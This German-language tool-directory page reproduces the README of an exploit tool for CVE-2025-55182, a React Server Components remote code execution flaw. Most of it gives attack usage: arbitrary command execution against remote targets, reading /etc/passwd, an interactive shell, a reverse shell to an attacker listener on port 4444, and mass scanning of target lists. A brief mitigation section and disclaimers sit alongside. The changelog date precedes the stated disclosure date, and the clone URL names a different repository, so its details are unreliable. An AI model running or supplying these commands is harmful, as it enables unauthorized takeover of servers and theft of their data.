Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182_liyon — CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
SchwachstellenscannerPayload-GenerierungExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRed TeamingRemote-Access-Tool
GitHubhujiaozhuzhu/cve-2025-55182_liyon
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182_liyon

CVE-2025-55182

Repository anzeigen

CVE-2025-55182 - React Server Components RCE

⚠️ Rechtshinweis: Dieses Tool dient ausschließlich der Sicherheitsforschung, autorisierten Penetrationstests und Bildungszwecken. Die Verwendung dieses Tools gegen Zielsysteme ohne ausdrückliche Genehmigung ist illegal und unethisch.

📋 Übersicht

CVE-2025-55182 ist eine kritische Schwachstelle für Remote Code Execution (RCE) in React Server Components (RSC), die es nicht authentifizierten Angreifern ermöglicht, durch bösartige JavaScript-Deserialisierung beliebigen Code auf dem Server auszuführen.

🎯 Schwachstellendetails

AttributWert
CVE IDCVE-2025-55182
CVSS-Score9.8 (Kritisch)
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche BerechtigungenKeine
BenutzerinteraktionKeine
AuswirkungHoch (Vertraulichkeit, Integrität, Verfügbarkeit)
Betroffene KomponenteReact Server Components (RSC)
Betroffene VersionenReact 18.x - 19.x (bestimmte Builds)
Offenlegungsdatum3. Dezember 2025
CVE-AliasReact2Shell

🔍 Technische Details

Grundursache: React Server Components deserialisieren bei der Verarbeitung von RSC-Payloads vom Benutzer bereitgestellte JavaScript-Objekte nicht ordnungsgemäß, sodass Angreifer bösartigen Code injizieren können, der auf dem Server ausgeführt wird.

Angriffsvektor: Bösartige RSC-Payloads in HTTP-Anfragen Auswirkung: Remote Code Execution ohne Authentifizierung, Serverübernahme, Datenleak

🚀 Funktionen

  • ✅ Single-File-Python-Exploit mit interaktiver Shell
  • ✅ Automatisierte Schwachstellenerkennung
  • ✅ Massen-Scan mit Multithread-Unterstützung
  • ✅ Docker-basierte verwundbare React-Umgebung
  • ✅ Unterstützung mehrerer Payload-Typen
  • ✅ Detaillierte Protokollierung und Fehlerbehandlung
  • ✅ Reverse-Shell-Einrichtung
  • ✅ Base64-Payload-Kodierung

📦 Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# Abhängigkeiten installieren
pip install -r requirements.txt

🎯 Verwendung

Schnellstart

root@kitploit:~
# Abhängigkeiten installieren
pip install requests

# Befehl auf dem verwundbaren Ziel ausführen
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# Interaktiver Shell-Modus
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

Erweiterte Optionen

root@kitploit:~
# Benutzerdefinierter Befehl
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# Reverse Shell mit benutzerdefinierter IP/Port erstellen
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# Massen-Scan
python exploit/batch_scanner.py -f targets.txt

# Ausführlicher Modus
python exploit/cve_2025_55182.py -u http://target.com -v

# Benutzerdefinierter User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ Einrichtung der Übungsumgebung

Mit Docker (empfohlen)

root@kitploit:~
cd target
docker-compose up -d

Manuelle Einrichtung

root@kitploit:~
cd target
npm install
npm run dev

Greifen Sie auf die verwundbare Anwendung zu: http://localhost:3000

📊 Angriffsszenarien

Szenario 1: Befehlsausführung

Führen Sie einen einzelnen Befehl auf dem verwundbaren Server aus:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

Erwartete Ausgabe:

root@kitploit:~
[+] Schwachstellenerkennung erfolgreich: React Server Components RCE
[+] Befehl ausgeführt: id
[+] Antwort:
uid=0(root) gid=0(root) groups=0(root)

Szenario 2: Interaktive Shell

Erhalten Sie eine interaktive Shell auf dem verwundbaren Server:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

Funktionen:

  • Tab-Vervollständigung
  • Befehlsverlauf
  • Mehrere Shell-Sitzungen
  • Datei-Upload/-Download

Szenario 3: Reverse Shell

Stellen Sie eine Reverse-Shell-Verbindung her:

root@kitploit:~
# Auf der Maschine des Angreifers
nc -lvnp 4444

# Exploit ausführen
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

Szenario 4: Massen-Scan

Scannen Sie mehrere Ziele auf Schwachstellen:

root@kitploit:~
# Zieldatei erstellen
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# Massen-Scanner ausführen
python exploit/batch_scanner.py -f targets.txt

🛡️ Mitigation und Verteidigung

Sofortmaßnahmen

  1. React aktualisieren

    root@kitploit:~
    npm install react@latest
    # Auf die behobene Version aktualisieren
    
  2. RSC-Anfragen blockieren

    root@kitploit:~
    // RSC vorübergehend deaktivieren
    const config = {
      enableRSC: false
    }
    
  3. WAF-Regeln

    • Anfragen mit RSC-Mustern blockieren
    • Verdächtige JavaScript-Payloads überwachen
    • Ratenbegrenzung für RSC-Endpunkte implementieren

Langfristige Behebung

  • Eingabevalidierung für RSC-Payloads implementieren
  • Sandbox-JavaScript-Ausführung verwenden
  • Regelmäßige Sicherheitsaudits
  • Unbefugten RSC-Zugriff überwachen

📚 Dokumentation

  • Schwachstellenanalyse - Tiefgehende technische Analyse
  • Benutzerhandbuch - Vollständige Nutzungsanleitung
  • Verteidigung und Behebung - Sicherheitshärtung

🧪 Tests

Manuelle Tests

root@kitploit:~
# Verwundbare Umgebung aufsetzen
cd target && docker-compose up -d

# Schwachstelle testen
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

Automatisierte Tests

root@kitploit:~
# Testsuite ausführen
python tests/test_exploit.py

🔬 Forschungsreferenzen

  • CVE-2025-55182 NVD-Eintrag
  • React-Sicherheitshinweis
  • Wiz-Forschungsblog
  • Project-Zero-Analyse

📝 Changelog

v1.0.0 (2025-04-02)

  • Erstveröffentlichung
  • RCE-Exploit für einzelne Ziele
  • Interaktiver Shell-Modus
  • Reverse-Shell-Unterstützung
  • Massen-Scan
  • Verwundbare Docker-Umgebung
  • Umfassende Dokumentation

🎓 Bildungszweck

Dieses Tool demonstriert:

  • Wie RCE-Schwachstellen in React funktionieren
  • Korrekte Exploit-Entwicklungspraktiken
  • Methoden der Sicherheitsbewertung
  • Prinzipien ethischen Hackings

👥 Mitwirkende

  • Sicherheitsforscher - Initiale Implementierung

📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die Datei LICENSE.

⚠️ Rechtliche und ethische Erklärung

Wichtig: Dieses Tool ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bestimmt.

Rechtliche Anforderungen

  • Nur auf Systemen verwenden, die Sie besitzen oder für die Sie eine ausdrückliche Testgenehmigung haben
  • Alle geltenden Gesetze und Vorschriften einhalten
  • Schwachstellen verantwortungsvoll an den Anbieter melden
  • Richtlinien zur verantwortungsvollen Offenlegung befolgen

Verbotene Handlungen

  • Unbefugter Zugriff auf Computersysteme
  • Angriffe auf Systeme ohne Genehmigung
  • Nutzung von Schwachstellen für böswillige Zwecke
  • Offenlegung oder Zerstörung von Daten

Rechtliche Konsequenzen

  • Strafrechtliche Anklagen wegen unbefugten Zugriffs
  • Zivilrechtliche Haftung für Schäden
  • Mögliche Haftstrafen
  • Berufliche Konsequenzen

Durch die Nutzung dieses Tools stimmen Sie zu:

  • Alle lokalen und internationalen Gesetze einzuhalten
  • Es nur für autorisierte Sicherheitstests zu verwenden
  • Gefundene Schwachstellen verantwortungsvoll zu melden
  • Es nicht für böswillige oder illegale Aktivitäten zu nutzen

📞 Schwachstellen melden

Wenn Sie diese Schwachstelle in Produktionssystemen entdecken:

  1. An den Anbieter melden

    • React-Team: [email protected]
    • Verantwortungsvolle Offenlegung befolgen
  2. CVE-Zuweisung

    • Bei NIST NVD einreichen
    • Offenlegungszeitplan einhalten
  3. Sicherheits-Community

    • Erkenntnisse teilen (nach dem Patch)
    • Zum Sicherheitswissen beitragen

Denken Sie daran: Sicherheitsforschung sollte stets ethisch und legal sein. Nutzen Sie Ihre Fähigkeiten, um das Internet sicherer zu machen! 🛡️

Tool herunterladen